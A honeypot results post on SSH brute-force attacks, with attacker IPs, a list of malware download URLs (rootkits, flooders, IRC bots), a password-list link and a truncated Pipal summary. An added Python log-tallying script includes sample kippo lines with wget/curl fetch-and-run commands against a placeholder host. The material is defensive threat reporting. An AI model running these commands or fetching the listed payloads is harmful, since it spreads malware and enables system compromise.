Articles in the Malware Category

2 Apr 2012

Here are the results of the attacks on my kippo honeypot.
Total SSH login attempts: 219710
Total unique passwords: 34354
Total attempts to wget a file and run it: 40 (including duplicates)
Total unique IPs that made those attempts: 205
Here is the list of IPs the bots/attackers came from:
108.15.99.40
109.148.120.142
109.248.137.103
109.73.169.35
109.96.44.131
109.97.82.81
110.164.66.252
112.25.19.10
113.108.103.11
113.108.237.66
113.169.107.217
113.179.89.224
114.108.177.252
114.255.58.182
115.236.185.203
117.240.234.216
117.243.250.249
118.220.175.104
119.134.251.100
119.161.162.185
119.188.7.185
119.84.84.110
120.132.132.74
121.14.46.119
121.251.88.220
122.146.199.190
122.49.6.31
123.125.149.134
123.18.117.70
124.119.23.169
124.125.135.114
124.133.48.92
124.238.214.46
124.238.214.90
124.72.48.61
130.157.145.92
134.208.6.43
141.105.82.2
141.8.193.225
151.13.197.22
151.28.122.164
151.40.20.202
151.80.215.20
1.55.112.125
172.158.118.44
172.158.2.176
172.158.27.46
172.158.29.117
172.158.87.42
173.15.213.104
173.234.63.146
173.234.63.154
175.125.92.199
178.162.149.24
182.140.145.17
182.236.164.11
182.50.0.237
182.79.252.246
184.107.241.186
186.28.247.7
188.138.40.166
188.138.89.152
188.173.171.146
188.173.182.104
188.173.243.66
188.227.74.162
188.26.202.221
188.26.203.137
188.26.204.120
188.27.187.135
188.27.22.191
188.27.42.109
188.27.42.56
188.27.42.99
190.210.142.75
190.95.69.241
193.110.253.199
193.34.145.55
193.90.12.22
194.183.89.224
195.22.100.150
195.34.183.18
196.21.60.69
199.0.172.37
199.119.204.3
199.119.227.48
199.19.212.103
199.71.214.67
200.196.48.121
200.42.220.228
200.98.207.108
201.144.245.135
201.218.252.140
201.253.14.235
201.43.143.30
201.49.57.81
201.91.26.138
202.201.1.170
203.252.154.194
203.90.136.77
204.57.82.8
206.80.80.100
208.115.200.25
208.115.236.51
209.131.201.184
210.51.174.189
210.51.48.94
211.103.188.92
211.167.39.250
211.253.5.200
211.27.225.183
211.55.76.53
211.99.134.27
213.171.220.17
213.190.161.143
2.137.113.104
216.53.213.120
217.198.160.133
217.199.134.214
218.57.136.62
218.57.8.23
218.61.34.140
218.8.190.178
219.235.240.41
220.182.51.11
221.122.125.125
221.204.246.72
221.207.229.6
221.231.140.146
222.122.20.226
222.169.224.178
222.44.124.187
222.58.151.69
223.204.213.57
24.96.31.206
31.214.39.176
41.196.236.229
41.249.41.78
42.117.2.53
46.102.11.108
46.102.12.158
46.214.21.53
46.24.240.155
46.254.20.36
49.212.118.52
50.30.33.90
50.56.222.222
58.11.115.168
58.215.187.45
58.28.154.75
60.244.113.231
61.155.128.32
61.191.39.19
62.37.22.2
62.84.74.166
63.135.56.2
64.183.83.122
64.31.17.135
64.31.43.140
69.64.75.136
70.87.117.36
74.117.58.92
78.225.217.80
78.83.102.35
79.113.15.91
79.113.54.212
79.145.76.47
79.180.156.165
79.181.20.223
80.82.209.245
80.92.240.36
80.94.65.50
81.18.246.182
82.137.12.56
82.137.12.59
82.137.13.151
82.137.14.199
82.194.76.61
82.77.8.110
83.170.81.186
83.41.92.34
83.58.92.175
84.22.183.113
85.137.88.88
85.49.133.240
86.124.225.213
86.186.241.109
88.12.87.93
88.14.23.44
89.136.1.59
91.123.200.46
91.196.122.71
91.205.189.27
91.207.230.51
91.207.231.190
91.215.180.202
91.228.197.152
91.233.105.4
92.251.192.182
92.251.235.216
92.83.105.212
93.112.71.98
94.129.104.5
96.126.120.46
96.56.154.34
And the files they tried to download and run:

http://cioculetz.altervista.org/hecaru.tar
http://eleet.at.ua/hack/flood/bash.tcl
http://equinox.ucoz.com/boti.tgz
http://equinox.ucoz.com/rk.tgz
http://equinox.ucoz.com/sshd.tgz
http://hackzone.ucoz.ro/mlinux.tgz
http://hackzone.ucoz.ro/ryo.tgz
http://hackzone.ucoz.ro/udp.pl
http://gblteam.webs.com/gosh.tgz.tar
http://italianusimixu.do.am/scan/boti.tgz
http://linuxtrade.webs.com/psybnc-linux.tgz
http://mirc.go.ro/ire.tgz
http://nasul.clan.su/udp.tar
http://root-arhive.at.ua/psybnc/psybnc-linux.jpg
http://rymont.webs.com/MechBot.tgz
http://rymont.webs.com/rk.jpg
http://scama.clan.su/max.pl
http://thw.xnetworld.com/devil/gosh.tgz.tar
http://tradelinux.fr/udp.tgz
http://ircd.do.am/scan/random.tgz
http://mile.go.ro/pic.jpg
http://RAYDENNN.EscorteDeLux.eu/R/ryo.tgz
http://RAYDENNN.EscorteDeLux.eu/R/udp.pl
http://scama.clan.su/gate.tgz
http://wadafak.altervista.org/mech.tgz
http://www.deathface.comlu.com/flod/udp.tgz
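The counts at the top of this post and the two lists above are the kind of thing a few lines of Python can pull out of kippo's text log. The script below is an added example, not code from the post or from the kippo project. Its log lines are constructed to approximate the `kippo.log` format (the `login attempt [user/password]` and `CMD:` events), using RFC 5737 documentation addresses and an `example.invalid` host so that it runs offline; the regular expressions are an assumption about that format and may need adjusting for other kippo versions. It splits the `[user/password]` field at the first slash only, so passwords containing a slash and empty passwords are counted correctly.

```python
"""Tally SSH brute-force activity from a kippo text log.

Added example, not part of the original post or of kippo itself.
The SAMPLE_LOG below is constructed to mimic kippo's log format:
  <ts> [SSHService ssh-userauth on HoneyPotTransport,<id>,<ip>] login attempt [<user>/<pw>] failed
  <ts> [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,<id>,<ip>] CMD: <cmd>
Other events (connection open/close, etc.) are ignored.
"""
import re
import sys
from collections import Counter

# Assumed kippo line shapes; the password field may itself contain '/' or be empty,
# so the user name is taken as everything up to the FIRST slash.
LOGIN_RE = re.compile(
    r"HoneyPotTransport,\d+,(?P<ip>\d+\.\d+\.\d+\.\d+)\] login attempt "
    r"\[(?P<user>[^/\]]*)/(?P<pw>.*)\] (?P<result>succeeded|failed)$"
)
CMD_RE = re.compile(r"HoneyPotTransport,\d+,(?P<ip>\d+\.\d+\.\d+\.\d+)\] CMD: (?P<cmd>.*)$")
DOWNLOADER_RE = re.compile(r"\b(wget|curl|fetch|lwp-download)\b")
# Stop a URL at whitespace or shell metacharacters so "wget http://x/y;perl y" yields http://x/y
URL_RE = re.compile(r"https?://[^\s;&|'\"<>]+")

# Constructed sample (documentation IPs, example.invalid host); not real attack data.
SAMPLE_LOG = """\
2012-03-30 01:02:03+0000 [SSHService ssh-userauth on HoneyPotTransport,7,192.0.2.10] login attempt [root/123456] failed
2012-03-30 01:02:04+0000 [SSHService ssh-userauth on HoneyPotTransport,7,192.0.2.10] login attempt [root/password] failed
2012-03-30 01:02:05+0000 [SSHService ssh-userauth on HoneyPotTransport,7,192.0.2.10] login attempt [root/123456] succeeded
2012-03-30 01:02:09+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,7,192.0.2.10] CMD: cd /tmp; wget http://example.invalid/udp.pl; perl udp.pl
2012-03-30 02:10:00+0000 [SSHService ssh-userauth on HoneyPotTransport,9,198.51.100.7] login attempt [admin/admin] failed
2012-03-30 02:10:01+0000 [SSHService ssh-userauth on HoneyPotTransport,9,198.51.100.7] login attempt [root/123456] failed
2012-03-30 02:10:02+0000 [SSHService ssh-userauth on HoneyPotTransport,9,198.51.100.7] login attempt [root/a/b] failed
2012-03-30 02:10:03+0000 [SSHService ssh-userauth on HoneyPotTransport,9,198.51.100.7] login attempt [root/] failed
2012-03-30 03:00:00+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,12,203.0.113.5] CMD: wget http://example.invalid/rk.tgz -O /var/tmp/rk.tgz && tar xzf /var/tmp/rk.tgz
2012-03-30 03:00:01+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,12,203.0.113.5] CMD: curl -O http://example.invalid/boti.tgz
2012-03-30 03:00:02+0000 [HoneyPotTransport,12,203.0.113.5] connection lost
"""


def ip_key(ip):
    """Sort key giving numeric (not string) order for dotted-quad addresses."""
    return tuple(int(part) for part in ip.split("."))


def summarize(log_text, top_n=10):
    """Return attempt totals, unique IPs, fetched URLs and a top-N password tally."""
    attempts = 0
    successes = 0
    passwords = Counter()          # password -> number of times tried
    ips = set()
    downloads = []                 # one entry per fetched URL, duplicates kept
    for line in log_text.splitlines():
        m = LOGIN_RE.search(line)
        if m:
            attempts += 1
            successes += m["result"] == "succeeded"
            passwords[m["pw"]] += 1
            ips.add(m["ip"])
            continue
        m = CMD_RE.search(line)
        if m and DOWNLOADER_RE.search(m["cmd"]):
            ips.add(m["ip"])
            downloads.extend((m["ip"], url) for url in URL_RE.findall(m["cmd"]))
    return {
        "login_attempts": attempts,
        "successful_logins": successes,
        "unique_passwords": len(passwords),
        "download_attempts": len(downloads),
        "unique_ips": sorted(ips, key=ip_key),
        "download_urls": sorted({url for _, url in downloads}),
        "top_passwords": passwords.most_common(top_n),
    }


if __name__ == "__main__":
    # Usage: python kippo_stats.py [/path/to/kippo.log]; without a path the sample is used.
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            text = fh.read()
    else:
        text = SAMPLE_LOG
    r = summarize(text)
    for key in ("login_attempts", "successful_logins", "unique_passwords", "download_attempts"):
        print(f"{key}: {r[key]}")
    print(f"unique IPs ({len(r['unique_ips'])}):", *r["unique_ips"], sep="\n  ")
    print("fetched URLs:", *r["download_urls"], sep="\n  ")
    print("top passwords:", *(f"{pw!r} = {n}" for pw, n in r["top_passwords"]), sep="\n  ")
```

Pointed at a real `kippo.log` this gives the same four totals as above, the IP list (in numeric order; the list above is string-sorted, which is why `1.55.112.125` sits between the 151.x and 172.x entries) and the set of fetched URLs; the per-password `Counter` is the tally a tool like Pipal is run over. One caveat: the unique-password count depends on how the `[user/password]` field is split and whether blank passwords are kept, so two tools can disagree by a few entries.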

Here is the password list they tried (sorted alphabetically):
http://0xa.li/files/pass_lst.zip
Pipal analysis of the list (thanks to Muhanad Shahat @sophto_92):

Total entries = 34352
Total unique entries = 34352

Top 10 passwords
…. = 1 (0.0%)
#### = 1 (0.0%)
….123 = 1 (0.0%)
123123 = …